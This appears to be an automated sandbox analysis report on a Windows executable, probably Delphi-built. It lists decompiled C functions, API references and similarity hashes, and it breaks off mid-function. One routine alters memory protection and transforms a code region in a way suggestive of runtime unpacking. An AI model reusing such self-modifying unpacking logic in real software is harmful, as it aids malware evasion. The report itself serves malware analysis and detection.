Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 98616ab8f6d9abe34e636c37f226d4eff00a51b2a12bf5a117eb49641acfee1c
Instruction ID: 6bd9ad4d31924b99b51aa544d21399d5d680fff9bd20fef1580424f470487bef
Opcode Fuzzy Hash: 98616ab8f6d9abe34e636c37f226d4eff00a51b2a12bf5a117eb49641acfee1c
Instruction Fuzzy Hash: AA31C870644204ABDB14FF69CC46B9A33E5AB44305F4080BBFD08DB297DEB8994D8B2D

Uniqueness

Uniqueness Score: -1.00%

Function 0042727C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042727C(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x492ac4 == 0) {
					 *0x492a9c = E00427194(0, _t8,  *0x492a9c, _t17, _t18);
					_t7 =  *0x492a9c(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}

APIs

GetSystemMetrics.USER32 ref: 004272DE

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

KiUserCallbackDispatcher.NTDLL ref: 004272A4

Strings

GetSystemMetrics, xrefs: 0042728C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCallbackDispatcherMetricsProcSystemUser
String ID: GetSystemMetrics
API String ID: 54681038-96882338
Opcode ID: 0c26782bd003c680462a4f7e02363b1f8c577a652b25e792e5475779f882d3f7
Instruction ID: 0c54ae4e5e3beb960f0165100a1caa746b2001f93ff8537b215b7333a5855368
Opcode Fuzzy Hash: 0c26782bd003c680462a4f7e02363b1f8c577a652b25e792e5475779f882d3f7
Instruction Fuzzy Hash: 85F0963271C571DAC7204A75BE855233646A766330FE0C7B7F511866D6C27C9841923D

Uniqueness

Uniqueness Score: -1.00%

Function 00440F64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00440F64(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x440fea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x492b74 =  *0x492b74 - 1;
				if( *0x492b74 < 0) {
					 *0x492b70 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x492b70;
					E00440D14(_t16, __edi,  *0x492b70);
					_t6 =  *0x431620; // 0x43166c
					E004137EC(_t6, _t16, _t17,  *0x492b70);
					_t8 =  *0x431620; // 0x43166c
					E0041388C(_t8, _t16, _t17, _t31);
					_t21 =  *0x431620; // 0x43166c
					_t10 =  *0x4425f4; // 0x442640
					E00413838(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x431620; // 0x43166c
					_t12 =  *0x440ff4; // 0x441040
					E00413838(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x431620; // 0x43166c
					_t14 =  *0x4411a8; // 0x4411f4
					E00413838(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x440ff1);
				return 0;
			}

APIs

GetVersion.KERNEL32(00000000,00440FEA), ref: 00440F7E

Part of subcall function 00440D14: GetCurrentProcessId.KERNEL32(?,00000000,00440E8C), ref: 00440D35
Part of subcall function 00440D14: GlobalAddAtomA.KERNEL32 ref: 00440D68
Part of subcall function 00440D14: GetCurrentThreadId.KERNEL32 ref: 00440D83
Part of subcall function 00440D14: GlobalAddAtomA.KERNEL32 ref: 00440DB9
Part of subcall function 00440D14: RegisterClipboardFormatA.USER32 ref: 00440DCF
Part of subcall function 00440D14: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00440E53
Part of subcall function 00440D14: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440E64

Strings

@&D, xrefs: 00440FB2

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
String ID: @&D
API String ID: 3775504709-1035227775
Opcode ID: a2fbba5a42664929df18566755faab9e3513ca1050ffd7aff72c1d59a57b5761
Instruction ID: 7a7f0a757190492a38e1b37b99fdc39b0e2de92bd21f2637399aa320090c02d8
Opcode Fuzzy Hash: a2fbba5a42664929df18566755faab9e3513ca1050ffd7aff72c1d59a57b5761
Instruction Fuzzy Hash: 7CF0CD78214641AFE314FF66EE1381837E8F74A306794103BF90083631CA78AC56CA4C

Uniqueness

Uniqueness Score: -1.00%

Function 004015B8, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015B8(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040146C(0x4925e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018C1), ref: 004015E7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018C1), ref: 0040160E

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 76e836fd95c562362f206a6cee2c1b3dd0eb72172e7f0547a6e7433b27dd2c69
Instruction ID: 5f734080e0c6898504fbed57d043c79a80c0a66a4bd47801b0e21cc9b2d0ee82
Opcode Fuzzy Hash: 76e836fd95c562362f206a6cee2c1b3dd0eb72172e7f0547a6e7433b27dd2c69
Instruction Fuzzy Hash: 3DF02E72B003202BEB30556A0CC1B5369C49F85764F190477FD4CFF3D9D6764C004259

Uniqueness

Uniqueness Score: -1.00%

Function 004755CC, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004755CC(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				long _v8;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t31;

				_t31 = _a4;
				if(E00475588( *((intOrPtr*)( *_t31))) == 0) {
					if(E004755C0( *((intOrPtr*)( *_t31))) == 0) {
						return 0;
					}
					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x475574;
					return 0xffffffffffffffff;
				}
				_t22 =  *(_t31 + 4);
				if(( *(_t22 + 0xa8) ^ 0x000aed2e) != 0x3f745) {
					return 0;
				}
				VirtualProtectEx(0xffffffff,  *(_t22 + 0xac), 0x13cb5, 4,  &_v8); // executed
				E004756B4(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xac)), 0x13cb5, __edi, __esi, 0x1a080, 0x476e18);
				_t29 =  *(_t31 + 4);
				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x3283;
				return _t29 | 0xffffffff;
			}

0x004755d1
0x004755df
0x00475651
0x00000000
0x00475666
0x0047565b
0x00000000
0x00475661
0x004755e1
0x004755f6
0x00000000
0x00475642
0x0047560c
0x0047562b
0x00475630
0x00475633
0x00000000

APIs

Part of subcall function 00475588: GetSystemTime.KERNEL32 ref: 0047558F
Part of subcall function 00475588: ExitProcess.KERNEL32(00000000), ref: 0047559E
Part of subcall function 00475588: GetNextDlgTabItem.USER32(00000000,00000000,00000000), ref: 004755B4

VirtualProtectEx.KERNEL32(000000FF,?,00013CB5,00000004,?), ref: 0047560C

Part of subcall function 004756B4: GetNextDlgTabItem.USER32(00000000,00000000,00000000), ref: 004756DF

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemNext$ExitProcessProtectSystemTimeVirtual
String ID:
API String ID: 3234653472-0
Opcode ID: a4aa576997493bf57116bfdc1c070e249d4816c36d3c8b245ddef3406778fff9
Instruction ID: 683db2bf605079b025cb99da7a3986bab2d689136ca3cf0b0fc224d54438be29
Opcode Fuzzy Hash: a4aa576997493bf57116bfdc1c070e249d4816c36d3c8b245ddef3406778fff9
Instruction Fuzzy Hash: 3F11A534604600EFDB40DF24C881EE273E5EB05724F64C6A6B91C5F3A6D6B4ED05CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040731A, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040731A(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x00407345
0x0040734c

APIs

CreateWindowExA.USER32 ref: 00407345

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
Instruction ID: 3ae3b0bb6aa290208680c541b8da8ad6351dd4405c79d6abd1241d14a227bfc1
Opcode Fuzzy Hash: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
Instruction Fuzzy Hash: A7E002B2204309BFEB00DE8ADCC1DABB7ACFB4C654F854115BB1C97242D275AD608B71

Uniqueness

Uniqueness Score: -1.00%

Function 0040731C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040731C(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x00407345
0x0040734c

APIs

CreateWindowExA.USER32 ref: 00407345

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
Instruction ID: 109ed22ea2e506524b14edc0d0bd377e8b92066772ad28182da1425e8690dcbf
Opcode Fuzzy Hash: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
Instruction Fuzzy Hash: F7E002B2204309BFDB00DE8ADCC1DABB7ACFB4C654F854105BB1C972429275AD608B71

Uniqueness

Uniqueness Score: -1.00%

Function 00405A64, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A64(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405CA0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}

0x00405a6c
0x00405a72
0x00405a7e
0x00405a82
0x00405a8b
0x00405a90
0x00405a92
0x00405a97
0x00405a99
0x00405a9c
0x00405a9c
0x00405a97
0x00405a9f
0x00405aaa

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004104AC,00405ACC,00406578,0000FF99,?,00000400,?,004104AC,0041416B,00000000,00414190), ref: 00405A82

Part of subcall function 00405CA0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001,004104AC,00405ACC,00406578,0000FF99,?), ref: 00405CBC
Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C), ref: 00405CF8
Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
Part of subcall function 00405CA0: RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction ID: d33aed5311a0e2fae4487a5322506e26d3b21fe1229f44e33d68ae0e5b1a5d0f
Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction Fuzzy Hash: 29E06D71A007208FDB10DEA888C1A4737D8AB08794F000A66FC58EF38AD374DD108BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040174C, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040174C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x4925e4; // 0x7833cc
				while(_t29 != 0x4925e4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004017B9

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f47e4311da42950ec54238d204e9b3a12ba0325d675df7de898aa2191d4c4d17
Instruction ID: 1ef196c48c205fabe416c2ab9c313d61ae50e0bb796a1c586f252d0c907e7949
Opcode Fuzzy Hash: f47e4311da42950ec54238d204e9b3a12ba0325d675df7de898aa2191d4c4d17
Instruction Fuzzy Hash: 24118E76A04705AFC3109F29CD80A2BBBE1EFD4760F16C53EE598A73A5D735AC408789

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1FC, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D1FC(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x492a20 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x492a1c; // 0x2310000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E004029BC(0x4764bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041D1F4(_t2, E0041D1D4);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041D1F4(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x492a20;
						 *0x492a20 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x492a1c = _t35;
				}
				_t25 =  *0x492a20;
				 *0x492a20 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x492a20;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D21A

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fd1ab33e4235b30f186c43104726c2ae7481be6225aaa20dbab57d05e4986641
Instruction ID: 4e78e070f51fdf12da19326942a77fcdf1f829aea583b288c94c8dd1e240b39b
Opcode Fuzzy Hash: fd1ab33e4235b30f186c43104726c2ae7481be6225aaa20dbab57d05e4986641
Instruction Fuzzy Hash: 62115AB56403059FC720DF19C880B82F7E5EF98350F10C53BE9A99B385D3B8E9458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401414, Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401414() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x4925e0 != 0) {
					L5:
					_t4 =  *0x4925e0;
					 *0x4925e0 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x4925dc; // 0x782d98
						 *_t12 = _t6;
						 *0x4925dc = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x4925e0;
							 *0x4925e0 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

0x0040141e
0x0040145a
0x0040145a
0x0040145e
0x00401462
0x00401420
0x00401427
0x0040142c
0x00401430
0x00401437
0x0040143c
0x0040143e
0x00401444
0x00401446
0x0040144a
0x0040144a
0x00401450
0x00401452
0x00401454
0x00401455
0x00000000
0x00401432
0x00401436
0x00401436
0x00401430

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,004925F4,00401477,?,?,00401517,?,?,?,?,?,00401A57), ref: 00401427

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 5d0ed41f96699d87f21007e53ca226916ca96f4b6e26f47a9f4cb0a19ccb1334
Instruction ID: 87dc5a11db38574667a11397b0d3af5e4500ab7b4b95afebe61081be112248ab
Opcode Fuzzy Hash: 5d0ed41f96699d87f21007e53ca226916ca96f4b6e26f47a9f4cb0a19ccb1334
Instruction Fuzzy Hash: 12F082B17012019FDB14CF69D88065577E1EBA932AF21807FD585D7360E7758C418B44

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004239CC, Relevance: 48.5, APIs: 32, Instructions: 500
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004239CC(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
				struct HBITMAP__* _v8;
				struct HPALETTE__* _v12;
				struct HPALETTE__* _v16;
				struct HPALETTE__* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				void* _v44;
				intOrPtr _v48;
				struct tagRGBQUAD _v52;
				struct HPALETTE__* _v56;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v132;
				intOrPtr _v136;
				void _v140;
				struct tagRECT _v156;
				void* __ebx;
				void* __ebp;
				signed short _t229;
				int _t281;
				signed int _t290;
				signed short _t292;
				struct HBRUSH__* _t366;
				struct HPALETTE__* _t422;
				signed int _t441;
				intOrPtr _t442;
				intOrPtr _t444;
				intOrPtr _t445;
				void* _t455;
				void* _t457;
				void* _t459;
				intOrPtr _t460;

				_t457 = _t459;
				_t460 = _t459 + 0xffffff68;
				_push(_t419);
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
						E00423588(_v8);
						_v116 = 0;
						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
							E004209DC();
						}
						_v28 = E00420AFC(GetDC(0));
						_v32 = E00420AFC(CreateCompatibleDC(_v28));
						_push(_t457);
						_push(0x42401a);
						_push( *[fs:edx]);
						 *[fs:edx] = _t460;
						if( *(_a8 + 0x18) >= 0x28) {
							_v40 = E00402754(0x42c);
							_push(_t457);
							_push(0x423d24);
							_push( *[fs:edx]);
							 *[fs:edx] = _t460;
							 *(_a8 + 0x18) = 0x28;
							 *((short*)(_a8 + 0x24)) = 1;
							if( *(_a8 + 0x26) == 0) {
								_t290 = GetDeviceCaps(_v28, 0xc);
								_t292 = GetDeviceCaps(_v28, 0xe);
								_t419 = _t290 * _t292;
								 *(_a8 + 0x26) = _t290 * _t292;
							}
							_t55 = _a8 + 0x18; // 0x18
							memcpy(_v40, _t55, 0xa << 2);
							 *(_a8 + 4) =  *(_a8 + 0x1c);
							_t441 = _a8;
							 *(_t441 + 8) =  *(_a8 + 0x20);
							if( *(_a8 + 0x26) > 8) {
								_t229 =  *(_a8 + 0x26);
								if(_t229 == 0x10) {
									L30:
									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
										E00423980(_a8);
